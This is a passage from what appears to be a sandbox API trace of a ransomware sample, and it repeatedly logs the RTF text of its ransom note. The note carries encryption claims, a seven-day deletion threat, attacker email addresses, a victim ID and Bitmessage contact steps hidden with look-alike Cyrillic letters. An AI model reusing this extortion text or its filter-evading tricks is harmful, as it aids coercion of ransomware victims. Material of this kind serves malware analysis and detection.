COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.171] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0292.171] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1ef8bd8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 